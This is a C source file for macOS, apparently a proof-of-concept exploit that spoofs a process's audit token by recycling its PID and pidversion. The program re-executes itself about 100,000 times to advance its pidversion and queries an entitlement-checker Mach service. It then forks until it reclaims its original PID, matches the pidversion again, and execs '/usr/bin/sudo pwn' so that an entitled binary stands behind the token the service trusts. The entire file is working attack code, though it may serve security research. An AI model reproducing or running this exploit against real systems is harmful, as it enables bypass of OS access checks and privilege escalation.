#include <bootstrap.h>
#include <bsm/libbsm.h>
#include <stdio.h>
#include <unistd.h>
#include <stdlib.h>

#include <mach/mach.h>

#include "entitlementChecker.h"

#define PIDVERSION_INCREMENT 100000

audit_token_t get_audit_token() {
    audit_token_t token;
    mach_msg_type_number_t autoken_cnt = TASK_AUDIT_TOKEN_COUNT;
    task_info(mach_task_self(), TASK_AUDIT_TOKEN, (task_info_t)&token, &autoken_cnt);
    return token;
}

void phase0() {
    // Perform some setup.
    int pid = fork();
    if (pid < 0) {
        printf("[-] Failed to fork\n");
        _exit(-1);
    } else if (pid > 0) {
        int status;
        waitpid(pid, &status, 0);
        sleep(100);
        _exit(0);
    }
}

void phase1(char* self, int num) {
    // Increment pidversion by a fixed number.
    if (num % 1000 == 0)
        printf("    %d\n", num);

    if (num < PIDVERSION_INCREMENT) {
        char str[10];
        sprintf(str, "%d", num + 1);

        execl(self, self, str, NULL);
        printf("[-] execve failed\n");
        _exit(-1);
    }
}

void phase2() {
    // Wrap around PIDs and reclaim the original PID.
    int counter = 0;
    int target = getpid();
    printf("[*] Trying to reclaim pid %d...\n", target);
    do {
        counter++;
        if (counter > 1000000) {
            printf("[-] Giving up\n");
            _exit(-1);
        }

        int pid = fork();
        if (pid < 0) {
            puts("[-] fork() failed");
            _exit(-1);
        } else if (pid > 0) {
            _exit(0);
        }

        if (counter % 1000 == 0)
            printf("    current pid: %d\n", getpid());

    } while (target != getpid());
}

void phase3(char* self, int target_pidversion) {
    // Increment our pidversion again until it matches the original one.
    audit_token_t token = get_audit_token();
    if (audit_token_to_pidversion(token) != target_pidversion) {
        char str[10];
        sprintf(str, "%d", target_pidversion);
        execl(self, self, str, "phase3", NULL);
        printf("[-] execve failed\n");
        _exit(-1);
    }
}

int main(int argc, char** argv) {
    audit_token_t token;

    int arg = 0;
    if (argc > 1)
        arg = atoi(argv[1]);

    switch (argc) {
        case 1:
            // Phase 0: initial invocation
            phase0();
            printf("[*] Starting...\n");
            token = get_audit_token();
            printf("    pid: %d, pidversion: %d\n", audit_token_to_pid(token), audit_token_to_pidversion(token));

            // fallthrough to phase 1
            printf("[*] Incrementing our pidversion by %d...\n", PIDVERSION_INCREMENT);
        case 2:
            // Phase 1: execve 10000 + x times to increment the p_idversion
            phase1(argv[0], arg);

            printf("[+] Phase 1 finished.\n");
            token = get_audit_token();
            printf("    pid: %d, pidversion: %d\n", audit_token_to_pid(token), audit_token_to_pidversion(token));

            // Perform operation requiring entitlements
            mach_port_t bp, sp;
            task_get_special_port(mach_task_self(), TASK_BOOTSTRAP_PORT, &bp);
            kern_return_t kr = bootstrap_look_up(bp, "net.saelo.entitlementchecker", &sp);
            check_entitlements(sp);

            arg = audit_token_to_pidversion(token) - 1;         // One execve at the end for the entitled binary

            // Phase 2: fork until the pid matches again
            phase2();

            printf("[+] Phase 2 finished.\n");
            token = get_audit_token();
            printf("    pid: %d, pidversion: %d\n", audit_token_to_pid(token), audit_token_to_pidversion(token));

            // fallthrough to phase 3
        case 3:
            // Phase 3: execve until the pidversion matches again
            phase3(argv[0], arg);

            printf("[+] Reclaimed pid and pidversion!\n");
            token = get_audit_token();
            printf("    pid: %d, pidversion: %d\n", audit_token_to_pid(token), audit_token_to_pidversion(token));
            puts("[+] All done. Spawning sudo now");
            execl("/usr/bin/sudo", "/usr/bin/sudo", "pwn", NULL);

            exit(0);
    }

    _exit(-1);
}
